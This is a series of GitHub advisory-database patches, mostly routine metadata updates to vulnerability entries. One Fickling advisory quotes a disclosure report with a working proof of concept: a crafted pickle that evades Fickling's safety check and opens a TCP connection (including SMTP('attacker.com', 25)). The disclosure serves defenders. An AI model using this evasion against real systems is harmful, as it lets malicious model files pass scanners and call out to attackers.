.../2026/02/GHSA-5vvm-67pj-72g4/GHSA-5vvm-67pj-72g4.json | 8 ++++++-- .../2026/02/GHSA-7g9x-cp9g-92mr/GHSA-7g9x-cp9g-92mr.json | 8 ++++++-- .../2026/02/GHSA-9mvc-8737-8j8h/GHSA-9mvc-8737-8j8h.json | 8 ++++++-- .../2026/02/GHSA-9pq4-5hcf-288c/GHSA-9pq4-5hcf-288c.json | 8 ++++++-- .../2026/02/GHSA-h7h7-mm68-gmrc/GHSA-h7h7-mm68-gmrc.json | 8 ++++++-- .../2026/02/GHSA-wgvp-vg3v-2xq3/GHSA-wgvp-vg3v-2xq3.json | 8 ++++++-- 7 files changed, 42 insertions(+), 14 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-4hfh-fch3-5q7p/GHSA-4hfh-fch3-5q7p.json b/advisories/github-reviewed/2026/02/GHSA-4hfh-fch3-5q7p/GHSA-4hfh-fch3-5q7p.json index 72543cb93e987..a079fd9c57ac1 100644 --- a/advisories/github-reviewed/2026/02/GHSA-4hfh-fch3-5q7p/GHSA-4hfh-fch3-5q7p.json +++ b/advisories/github-reviewed/2026/02/GHSA-4hfh-fch3-5q7p/GHSA-4hfh-fch3-5q7p.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4hfh-fch3-5q7p", - "modified": "2026-02-19T19:40:08Z", + "modified": "2026-02-23T22:21:47Z", "published": "2026-02-19T19:40:08Z", "aliases": [ "CVE-2026-27120" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/vapor/leaf-kit/security/advisories/GHSA-4hfh-fch3-5q7p" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27120" + }, { "type": "WEB", "url": "https://github.com/vapor/leaf-kit/commit/8919e39476c3a4ba05c28b71546bb9195f87ef34" @@ -58,6 +62,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-19T19:40:08Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T22:16:29Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-5vvm-67pj-72g4/GHSA-5vvm-67pj-72g4.json b/advisories/github-reviewed/2026/02/GHSA-5vvm-67pj-72g4/GHSA-5vvm-67pj-72g4.json index 38ee3f6575858..90c1d4443188d 100644 --- a/advisories/github-reviewed/2026/02/GHSA-5vvm-67pj-72g4/GHSA-5vvm-67pj-72g4.json +++ b/advisories/github-reviewed/2026/02/GHSA-5vvm-67pj-72g4/GHSA-5vvm-67pj-72g4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5vvm-67pj-72g4", - "modified": "2026-02-19T15:16:31Z", + "modified": "2026-02-23T22:21:12Z", "published": "2026-02-19T15:16:31Z", "aliases": [ "CVE-2026-27111" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/akuity/kargo/security/advisories/GHSA-5vvm-67pj-72g4" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27111" + }, { "type": "WEB", "url": "https://github.com/akuity/kargo/commit/833314cad5513d48d89431493325ae44c1324a49" @@ -56,6 +60,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-19T15:16:31Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T22:16:29Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-7g9x-cp9g-92mr/GHSA-7g9x-cp9g-92mr.json b/advisories/github-reviewed/2026/02/GHSA-7g9x-cp9g-92mr/GHSA-7g9x-cp9g-92mr.json index 765df23a31c30..3bbf4e3c415a3 100644 --- a/advisories/github-reviewed/2026/02/GHSA-7g9x-cp9g-92mr/GHSA-7g9x-cp9g-92mr.json +++ b/advisories/github-reviewed/2026/02/GHSA-7g9x-cp9g-92mr/GHSA-7g9x-cp9g-92mr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7g9x-cp9g-92mr", - "modified": "2026-02-19T15:16:46Z", + "modified": "2026-02-23T22:21:26Z", "published": "2026-02-19T15:16:46Z", "aliases": [ "CVE-2026-27112" @@ -78,6 +78,10 @@ "type": "WEB", "url": "https://github.com/akuity/kargo/security/advisories/GHSA-7g9x-cp9g-92mr" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27112" + }, { "type": "WEB", "url": "https://github.com/akuity/kargo/commit/155c6852ffbffa2902f18e6c7add91a846e8d344" @@ -94,6 +98,6 @@ "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2026-02-19T15:16:46Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T22:16:29Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-9mvc-8737-8j8h/GHSA-9mvc-8737-8j8h.json b/advisories/github-reviewed/2026/02/GHSA-9mvc-8737-8j8h/GHSA-9mvc-8737-8j8h.json index 877af57315714..248e75921afd6 100644 --- a/advisories/github-reviewed/2026/02/GHSA-9mvc-8737-8j8h/GHSA-9mvc-8737-8j8h.json +++ b/advisories/github-reviewed/2026/02/GHSA-9mvc-8737-8j8h/GHSA-9mvc-8737-8j8h.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9mvc-8737-8j8h", - "modified": "2026-02-18T22:41:24Z", + "modified": "2026-02-23T22:21:03Z", "published": "2026-02-18T22:41:24Z", "aliases": [ "CVE-2026-27026" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/py-pdf/pypdf/security/advisories/GHSA-9mvc-8737-8j8h" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27026" + }, { "type": "WEB", "url": "https://github.com/py-pdf/pypdf/pull/3644" @@ -64,6 +68,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:41:24Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T22:16:29Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-9pq4-5hcf-288c/GHSA-9pq4-5hcf-288c.json b/advisories/github-reviewed/2026/02/GHSA-9pq4-5hcf-288c/GHSA-9pq4-5hcf-288c.json index 3872121e1116b..3df151e98ae72 100644 --- a/advisories/github-reviewed/2026/02/GHSA-9pq4-5hcf-288c/GHSA-9pq4-5hcf-288c.json +++ b/advisories/github-reviewed/2026/02/GHSA-9pq4-5hcf-288c/GHSA-9pq4-5hcf-288c.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9pq4-5hcf-288c", - "modified": "2026-02-19T15:18:02Z", + "modified": "2026-02-23T22:21:38Z", "published": "2026-02-19T15:18:02Z", "aliases": [ "CVE-2026-27118" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/sveltejs/kit/security/advisories/GHSA-9pq4-5hcf-288c" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27118" + }, { "type": "PACKAGE", "url": "https://github.com/sveltejs/kit" @@ -52,6 +56,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-19T15:18:02Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T22:16:29Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-h7h7-mm68-gmrc/GHSA-h7h7-mm68-gmrc.json b/advisories/github-reviewed/2026/02/GHSA-h7h7-mm68-gmrc/GHSA-h7h7-mm68-gmrc.json index af8b34561f079..165d729b45b01 100644 --- a/advisories/github-reviewed/2026/02/GHSA-h7h7-mm68-gmrc/GHSA-h7h7-mm68-gmrc.json +++ b/advisories/github-reviewed/2026/02/GHSA-h7h7-mm68-gmrc/GHSA-h7h7-mm68-gmrc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-h7h7-mm68-gmrc", - "modified": "2026-02-19T15:18:19Z", + "modified": "2026-02-23T22:22:08Z", "published": "2026-02-19T15:18:19Z", "aliases": [ "CVE-2026-27119" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/sveltejs/svelte/security/advisories/GHSA-h7h7-mm68-gmrc" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27119" + }, { "type": "PACKAGE", "url": "https://github.com/sveltejs/svelte" @@ -52,6 +56,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-19T15:18:19Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T23:16:02Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-wgvp-vg3v-2xq3/GHSA-wgvp-vg3v-2xq3.json b/advisories/github-reviewed/2026/02/GHSA-wgvp-vg3v-2xq3/GHSA-wgvp-vg3v-2xq3.json index 3b871ae330281..9ab43deb3901c 100644 --- a/advisories/github-reviewed/2026/02/GHSA-wgvp-vg3v-2xq3/GHSA-wgvp-vg3v-2xq3.json +++ b/advisories/github-reviewed/2026/02/GHSA-wgvp-vg3v-2xq3/GHSA-wgvp-vg3v-2xq3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-wgvp-vg3v-2xq3", - "modified": "2026-02-18T22:41:13Z", + "modified": "2026-02-23T22:20:51Z", "published": "2026-02-18T22:41:13Z", "aliases": [ "CVE-2026-27025" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/py-pdf/pypdf/security/advisories/GHSA-wgvp-vg3v-2xq3" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27025" + }, { "type": "WEB", "url": "https://github.com/py-pdf/pypdf/pull/3646" @@ -64,6 +68,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:41:13Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T22:16:28Z" } } \ No newline at end of file From c4a8d9ac872a96751b0050ba71b1da6e806f4b99 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 22:25:09 +0000 Subject: [PATCH 64/77] Publish Advisories GHSA-97rm-xj73-33jh GHSA-crpf-4hrx-3jrp GHSA-f7gr-6p89-r883 GHSA-m56q-vw4c-c2cp --- .../2026/02/GHSA-97rm-xj73-33jh/GHSA-97rm-xj73-33jh.json | 8 ++++++-- .../2026/02/GHSA-crpf-4hrx-3jrp/GHSA-crpf-4hrx-3jrp.json | 8 ++++++-- .../2026/02/GHSA-f7gr-6p89-r883/GHSA-f7gr-6p89-r883.json | 8 ++++++-- .../2026/02/GHSA-m56q-vw4c-c2cp/GHSA-m56q-vw4c-c2cp.json | 8 ++++++-- 4 files changed, 24 insertions(+), 8 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-97rm-xj73-33jh/GHSA-97rm-xj73-33jh.json b/advisories/github-reviewed/2026/02/GHSA-97rm-xj73-33jh/GHSA-97rm-xj73-33jh.json index 27ab365103a7c..ee9e8fcbb4f0a 100644 --- a/advisories/github-reviewed/2026/02/GHSA-97rm-xj73-33jh/GHSA-97rm-xj73-33jh.json +++ b/advisories/github-reviewed/2026/02/GHSA-97rm-xj73-33jh/GHSA-97rm-xj73-33jh.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-97rm-xj73-33jh", - "modified": "2026-02-19T20:27:11Z", + "modified": "2026-02-23T22:23:34Z", "published": "2026-02-19T20:27:11Z", "aliases": [ "CVE-2026-27203" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/YosefHayim/ebay-mcp/security/advisories/GHSA-97rm-xj73-33jh" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27203" + }, { "type": "WEB", "url": "https://github.com/YosefHayim/ebay-mcp/commit/aab0bda75ea9dd27aa37d0d8524d7cf41b3c4a9a" @@ -57,6 +61,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-19T20:27:11Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T00:16:17Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-crpf-4hrx-3jrp/GHSA-crpf-4hrx-3jrp.json b/advisories/github-reviewed/2026/02/GHSA-crpf-4hrx-3jrp/GHSA-crpf-4hrx-3jrp.json index 0ff56e9b61c88..46c3cc26d8aac 100644 --- a/advisories/github-reviewed/2026/02/GHSA-crpf-4hrx-3jrp/GHSA-crpf-4hrx-3jrp.json +++ b/advisories/github-reviewed/2026/02/GHSA-crpf-4hrx-3jrp/GHSA-crpf-4hrx-3jrp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-crpf-4hrx-3jrp", - "modified": "2026-02-19T20:28:49Z", + "modified": "2026-02-23T22:23:50Z", "published": "2026-02-19T20:28:49Z", "aliases": [ "CVE-2026-27125" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/sveltejs/svelte/security/advisories/GHSA-crpf-4hrx-3jrp" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27125" + }, { "type": "WEB", "url": "https://github.com/sveltejs/svelte/commit/73098bb26c6f06e7fd1b0746d817d2c5ee90755f" @@ -63,6 +67,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-19T20:28:49Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T23:16:02Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-f7gr-6p89-r883/GHSA-f7gr-6p89-r883.json b/advisories/github-reviewed/2026/02/GHSA-f7gr-6p89-r883/GHSA-f7gr-6p89-r883.json index 3decac2d67950..c161c81275781 100644 --- a/advisories/github-reviewed/2026/02/GHSA-f7gr-6p89-r883/GHSA-f7gr-6p89-r883.json +++ b/advisories/github-reviewed/2026/02/GHSA-f7gr-6p89-r883/GHSA-f7gr-6p89-r883.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-f7gr-6p89-r883", - "modified": "2026-02-19T15:18:33Z", + "modified": "2026-02-23T22:23:05Z", "published": "2026-02-19T15:18:33Z", "aliases": [ "CVE-2026-27121" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/sveltejs/svelte/security/advisories/GHSA-f7gr-6p89-r883" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27121" + }, { "type": "PACKAGE", "url": "https://github.com/sveltejs/svelte" @@ -55,6 +59,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-19T15:18:33Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T23:16:02Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-m56q-vw4c-c2cp/GHSA-m56q-vw4c-c2cp.json b/advisories/github-reviewed/2026/02/GHSA-m56q-vw4c-c2cp/GHSA-m56q-vw4c-c2cp.json index 4d21f50aa3d75..a9d794b7b9128 100644 --- a/advisories/github-reviewed/2026/02/GHSA-m56q-vw4c-c2cp/GHSA-m56q-vw4c-c2cp.json +++ b/advisories/github-reviewed/2026/02/GHSA-m56q-vw4c-c2cp/GHSA-m56q-vw4c-c2cp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m56q-vw4c-c2cp", - "modified": "2026-02-19T15:18:42Z", + "modified": "2026-02-23T22:23:26Z", "published": "2026-02-19T15:18:42Z", "aliases": [ "CVE-2026-27122" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/sveltejs/svelte/security/advisories/GHSA-m56q-vw4c-c2cp" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27122" + }, { "type": "PACKAGE", "url": "https://github.com/sveltejs/svelte" @@ -55,6 +59,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-19T15:18:42Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T23:16:02Z" } } \ No newline at end of file From 66ce5632fdf4bc4ec8bb2fdc4e38b0fd796c9720 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 22:27:03 +0000 Subject: [PATCH 65/77] Publish Advisories GHSA-83pf-v6qq-pwmr GHSA-8r7r-f4gm-wcpq GHSA-c87c-78rc-vmv2 GHSA-mp4x-c34x-wv3x GHSA-ppf9-4ffw-hh4p --- .../02/GHSA-83pf-v6qq-pwmr/GHSA-83pf-v6qq-pwmr.json | 11 +++++++---- .../02/GHSA-8r7r-f4gm-wcpq/GHSA-8r7r-f4gm-wcpq.json | 8 ++++++-- .../02/GHSA-c87c-78rc-vmv2/GHSA-c87c-78rc-vmv2.json | 8 ++++++-- .../02/GHSA-mp4x-c34x-wv3x/GHSA-mp4x-c34x-wv3x.json | 8 ++++++-- .../02/GHSA-ppf9-4ffw-hh4p/GHSA-ppf9-4ffw-hh4p.json | 8 ++++++-- 5 files changed, 31 insertions(+), 12 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-83pf-v6qq-pwmr/GHSA-83pf-v6qq-pwmr.json b/advisories/github-reviewed/2026/02/GHSA-83pf-v6qq-pwmr/GHSA-83pf-v6qq-pwmr.json index b624bac6e6e65..5173a6b26e105 100644 --- a/advisories/github-reviewed/2026/02/GHSA-83pf-v6qq-pwmr/GHSA-83pf-v6qq-pwmr.json +++ b/advisories/github-reviewed/2026/02/GHSA-83pf-v6qq-pwmr/GHSA-83pf-v6qq-pwmr.json @@ -1,11 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-83pf-v6qq-pwmr", - "modified": "2026-02-20T18:24:46Z", + "modified": "2026-02-23T22:25:43Z", "published": "2026-02-20T18:24:46Z", "aliases": [], "summary": "Fickling has a detection bypass via stdlib network-protocol constructors", - "details": "# Our assessment\n\n`imtplib`, `imaplib`, `ftplib`, `poplib`, `telnetlib`, and `nntplib` are added to the list of unsafe imports (https://github.com/trailofbits/fickling/commit/6d20564d23acf14b42ec883908aed159be7b9ade). The `UnusedVariables` heuristic works as expected.\n\n# Original report \n\n## Summary\n\nFickling's `check_safety()` API and `--check-safety` CLI flag incorrectly rate as\n`LIKELY_SAFE` pickle files that open outbound TCP connections at deserialization time\nusing stdlib network-protocol constructors: `smtplib.SMTP`, `imaplib.IMAP4`,\n`ftplib.FTP`, `poplib.POP3`, `telnetlib.Telnet`, and `nntplib.NNTP`.\n\nThe bypass exploits two independent root causes described below.\n\n---\n\n## Root Cause 1: Incomplete blocklist (fixed in PR #233)\n\n`fickling/fickle.py` (lines 41-97) defines `UNSAFE_IMPORTS`, the primary blocklist.\n`fickling/analysis.py` (lines 229-248) defines the parallel\n`UnsafeImportsML.UNSAFE_MODULES` dict. Both omitted the following stdlib\nnetwork-protocol modules whose constructors open a TCP socket at instantiation time:\n\n| Module | Class | Default port | Constructor side-effect |\n|---|---|---|---|\n| `smtplib` | `SMTP` | 25 | TCP connect, reads SMTP banner, sends EHLO |\n| `imaplib` | `IMAP4` | 143 | TCP connect, reads IMAP capability banner |\n| `ftplib` | `FTP` | 21 | TCP connect, reads FTP welcome banner |\n| `poplib` | `POP3` | 110 | TCP connect, reads POP3 greeting |\n| `telnetlib` | `Telnet` | 23 | TCP connect |\n| `nntplib` | `NNTP` | 119 | TCP connect, NNTP handshake |\n\nBecause these module names were absent from both blocklists, `UnsafeImportsML`,\n`UnsafeImports`, and `NonStandardImports` all stayed silent. All six are genuine\nstdlib modules so `is_std_module()` returned `True` and `NonStandardImports` did\nnot fire.\n\n**Status: patched in PR #233.** The six modules have been added to `UNSAFE_IMPORTS`.\n\n---\n\n## Root Cause 2: Logic flaw in `unused_assignments()` at `fickle.py:1183` (unpatched)\n\n### Description\n\n`unused_assignments()` in `fickling/fickle.py` (lines 1174-1204) identifies variables\nthat are assigned but never referenced. `UnusedVariables` analysis calls this method\nand raises `SUSPICIOUS` for any unreferenced variable -- this would otherwise catch a\nbare `REDUCE` opcode that stores its result without using it.\n\nThe flaw is at line 1183. The method iterates over `module_body` statements and, when\nit encounters the final `result = ` assignment, breaks out of the loop\nimmediately without first walking the right-hand side expression for `Name` references:\n\n```python\n# fickling/fickle.py:1183 (current code -- vulnerable)\nif (\n len(statement.targets) == 1\n and isinstance(statement.targets[0], ast.Name)\n and statement.targets[0].id == \"result\"\n):\n # this is the return value of the program\n break # exits WITHOUT scanning statement.value\n```\n\nAny variable that appears only in the RHS of `result = ` is therefore never\nadded to the `used` set and is incorrectly classified as unused.\n\n### How this enables bypass suppression\n\nWhen fickling processes a `REDUCE` opcode in isolation, it generates:\n\n```python\n_var0 = SMTP('attacker.com', 25)\nresult = _var0\n```\n\nBecause the loop breaks before scanning `result = _var0`, `_var0` never enters\n`used`. `UnusedVariables` sees `_var0` as unused and raises `SUSPICIOUS`.\n\nAdding a `BUILD` opcode with an empty dict after the `REDUCE` changes the generated\nAST to:\n\n```python\nfrom smtplib import SMTP\n_var0 = SMTP('attacker.com', 25) # dangerous call\n_var1 = _var0 # BUILD step 1: intermediate reference\n_var1.__setstate__({}) # BUILD step 2: state call\nresult = _var1\n```\n\nNow `_var0` appears on the RHS of `_var1 = _var0`, a statement processed before the\nbreak, so `_var0` correctly enters `used` and `UnusedVariables` stays silent.\n\nThe `__setstate__` call is excluded from `OvertlyBadEvals` because\n`ASTProperties.visit_Call` places it in `calls` but not in `non_setstate_calls`\n(line 562), and `OvertlyBadEvals` only iterates `non_setstate_calls`.\n\nThe `SMTP(...)` call is skipped by `OvertlyBadEvals` because `_process_import` adds\n`SMTP` to `likely_safe_imports` for any stdlib module (line 550), and `OvertlyBadEvals`\nskips calls whose function name is in `likely_safe_imports` (lines 339-345).\n\n**Net result: zero warnings, severity `LIKELY_SAFE`.**\n\nThis flaw is generic -- it applies to any module not on the blocklist, not just the\nsix fixed in PR #233. Any future blocklist gap can be silently exploited using the\nsame `REDUCE + EMPTY_DICT + BUILD` pattern as long as this flaw remains unpatched.\n\n### Bypass opcode sequence\n\n```\nOffset Opcode Argument\n------ ------ --------\n0 PROTO 4\n2 GLOBAL 'smtplib' 'SMTP'\n16 SHORT_BINUNICODE 'attacker.com'\n30 BININT2 25\n33 TUPLE2\n34 REDUCE <- TCP connection opened here\n35 EMPTY_DICT\n36 BUILD <- suppresses UnusedVariables via flaw\n37 STOP\n```\n\nFickling's synthetic AST for this sequence (what all analysis passes inspect):\n\n```python\nfrom smtplib import SMTP\n_var0 = SMTP('attacker.com', 25)\n_var1 = _var0\n_var1.__setstate__({})\nresult = _var1\n```\n\nNo analysis rule in fickling fires on this AST.\n\n### Proof of Concept\n\nRequires only `pip install fickling`. Save as `poc.py` and run.\n\n```python\nimport socket\nimport threading\nimport pickle\n\ndef build_bypass_pickle(host: str, port: int) -> bytes:\n h = host.encode(\"utf-8\")\n return b\"\".join([\n b\"\\x80\\x04\",\n b\"csmtplib\\nSMTP\\n\",\n b\"\\x8c\" + bytes([len(h)]) + h,\n b\"M\" + bytes([port & 0xFF, (port >> 8) & 0xFF]),\n b\"\\x86\", # TUPLE2\n b\"R\", # REDUCE\n b\"}\", # EMPTY_DICT\n b\"b\", # BUILD\n b\".\", # STOP\n ])\n\ndef run_poc():\n from fickling.analysis import check_safety\n from fickling.fickle import Pickled\n\n HOST, PORT = \"127.0.0.1\", 19902\n received = []\n\n def listener():\n srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n srv.bind((HOST, PORT))\n srv.listen(1)\n srv.settimeout(5)\n try:\n conn, addr = srv.accept()\n received.append(addr)\n conn.close()\n except socket.timeout:\n pass\n srv.close()\n\n t = threading.Thread(target=listener, daemon=True)\n t.start()\n\n raw = build_bypass_pickle(HOST, PORT)\n loaded = Pickled.load(raw)\n result = check_safety(loaded)\n\n print(f\"[*] fickling severity : {result.severity.name}\")\n print(f\"[*] fickling is_safe : {result.severity.name == 'LIKELY_SAFE'}\")\n\n assert result.severity.name == \"LIKELY_SAFE\", \"Bypass failed\"\n print(\"[+] fickling rates the pickle as LIKELY_SAFE <-- bypass confirmed\")\n\n print(\"[*] Calling pickle.loads() to simulate victim loading the file...\")\n try:\n pickle.loads(raw)\n except Exception:\n pass\n\n t.join(timeout=5)\n\n if received:\n print(f\"[+] Incoming TCP connection received from {received[0]}\")\n print(\"[+] FULL BYPASS CONFIRMED: outbound connection made while fickling reported LIKELY_SAFE\")\n else:\n print(\"[-] No TCP connection received (network blocked)\")\n print(\" fickling still rated LIKELY_SAFE -- static analysis bypass confirmed regardless\")\n\nif __name__ == \"__main__\":\n run_poc()\n```\n\n### Expected output\n\n```\n[*] fickling severity : LIKELY_SAFE\n[*] fickling is_safe : True\n[+] fickling rates the pickle as LIKELY_SAFE <-- bypass confirmed\n[*] Calling pickle.loads() to simulate victim loading the file...\n[+] Incoming TCP connection received from ('127.0.0.1', 58412)\n[+] FULL BYPASS CONFIRMED: outbound connection made while fickling reported LIKELY_SAFE\n```\n\nTested on Python 3.11.1, Windows. Not OS-specific.\n\n### Impact\n\nAn attacker distributing a malicious pickle file (e.g. a crafted ML model checkpoint)\ncan silently:\n\n- **Enumerate victims** -- receive a TCP callback every time the pickle is loaded,\n including in sandboxed environments\n- **Exfiltrate host identity** -- victim IP, hostname (via SMTP EHLO), and service\n banners are sent to the attacker's server\n- **Probe internal services (SSRF)** -- if the victim host can reach internal SMTP\n relays, IMAP stores, or FTP servers, the pickle probes those services on the\n attacker's behalf\n- **Establish a covert channel** -- protocol handshakes carry attacker-controlled\n bytes through a channel fickling explicitly labels safe\n\nThe `is_likely_safe()` helper (`fickling/analysis.py:468-474`) and the `--check-safety`\nCLI flag both gate on `severity == LIKELY_SAFE`. This bypass clears that gate\ncompletely with zero warnings.\n\n### Suggested fix\n\nWalk `statement.value` before the `break` so variables referenced only in the result\nassignment are correctly counted as used:\n\n```python\n# fickling/fickle.py:1183 -- suggested fix\nif (\n len(statement.targets) == 1\n and isinstance(statement.targets[0], ast.Name)\n and statement.targets[0].id == \"result\"\n):\n # scan RHS before breaking so variables used only here are marked as used\n for node in ast.walk(statement.value):\n if isinstance(node, ast.Name):\n used.add(node.id)\n break\n```\n\nThis is the same pattern already used for every other statement in the loop\n(lines 1200-1203). All 55 non-torch tests pass with this fix applied.\n\n---\n\n## Affected versions\n\nAll releases including `v0.1.7` (latest). Confirmed on latest `master` as of\n2026-02-19. Root cause 1 patched in PR #233 (master only, not yet released).\nRoot cause 2 unpatched as of this report.\n\n## Reporter\n\nAnmol Vats", + "details": "# Our assessment\n\n`imtplib`, `imaplib`, `ftplib`, `poplib`, `telnetlib`, and `nntplib` were added to the list of unsafe imports (https://github.com/trailofbits/fickling/commit/6d20564d23acf14b42ec883908aed159be7b9ade). The `UnusedVariables` heuristic works as expected.\n\n# Original report \n\n## Summary\n\nFickling's `check_safety()` API and `--check-safety` CLI flag incorrectly rate as\n`LIKELY_SAFE` pickle files that open outbound TCP connections at deserialization time\nusing stdlib network-protocol constructors: `smtplib.SMTP`, `imaplib.IMAP4`,\n`ftplib.FTP`, `poplib.POP3`, `telnetlib.Telnet`, and `nntplib.NNTP`.\n\nThe bypass exploits two independent root causes described below.\n\n---\n\n## Root Cause 1: Incomplete blocklist (fixed in PR #233)\n\n`fickling/fickle.py` (lines 41-97) defines `UNSAFE_IMPORTS`, the primary blocklist.\n`fickling/analysis.py` (lines 229-248) defines the parallel\n`UnsafeImportsML.UNSAFE_MODULES` dict. Both omitted the following stdlib\nnetwork-protocol modules whose constructors open a TCP socket at instantiation time:\n\n| Module | Class | Default port | Constructor side-effect |\n|---|---|---|---|\n| `smtplib` | `SMTP` | 25 | TCP connect, reads SMTP banner, sends EHLO |\n| `imaplib` | `IMAP4` | 143 | TCP connect, reads IMAP capability banner |\n| `ftplib` | `FTP` | 21 | TCP connect, reads FTP welcome banner |\n| `poplib` | `POP3` | 110 | TCP connect, reads POP3 greeting |\n| `telnetlib` | `Telnet` | 23 | TCP connect |\n| `nntplib` | `NNTP` | 119 | TCP connect, NNTP handshake |\n\nBecause these module names were absent from both blocklists, `UnsafeImportsML`,\n`UnsafeImports`, and `NonStandardImports` all stayed silent. All six are genuine\nstdlib modules so `is_std_module()` returned `True` and `NonStandardImports` did\nnot fire.\n\n**Status: patched in PR #233.** The six modules have been added to `UNSAFE_IMPORTS`.\n\n---\n\n## Root Cause 2: Logic flaw in `unused_assignments()` at `fickle.py:1183` (unpatched)\n\n### Description\n\n`unused_assignments()` in `fickling/fickle.py` (lines 1174-1204) identifies variables\nthat are assigned but never referenced. `UnusedVariables` analysis calls this method\nand raises `SUSPICIOUS` for any unreferenced variable -- this would otherwise catch a\nbare `REDUCE` opcode that stores its result without using it.\n\nThe flaw is at line 1183. The method iterates over `module_body` statements and, when\nit encounters the final `result = ` assignment, breaks out of the loop\nimmediately without first walking the right-hand side expression for `Name` references:\n\n```python\n# fickling/fickle.py:1183 (current code -- vulnerable)\nif (\n len(statement.targets) == 1\n and isinstance(statement.targets[0], ast.Name)\n and statement.targets[0].id == \"result\"\n):\n # this is the return value of the program\n break # exits WITHOUT scanning statement.value\n```\n\nAny variable that appears only in the RHS of `result = ` is therefore never\nadded to the `used` set and is incorrectly classified as unused.\n\n### How this enables bypass suppression\n\nWhen fickling processes a `REDUCE` opcode in isolation, it generates:\n\n```python\n_var0 = SMTP('attacker.com', 25)\nresult = _var0\n```\n\nBecause the loop breaks before scanning `result = _var0`, `_var0` never enters\n`used`. `UnusedVariables` sees `_var0` as unused and raises 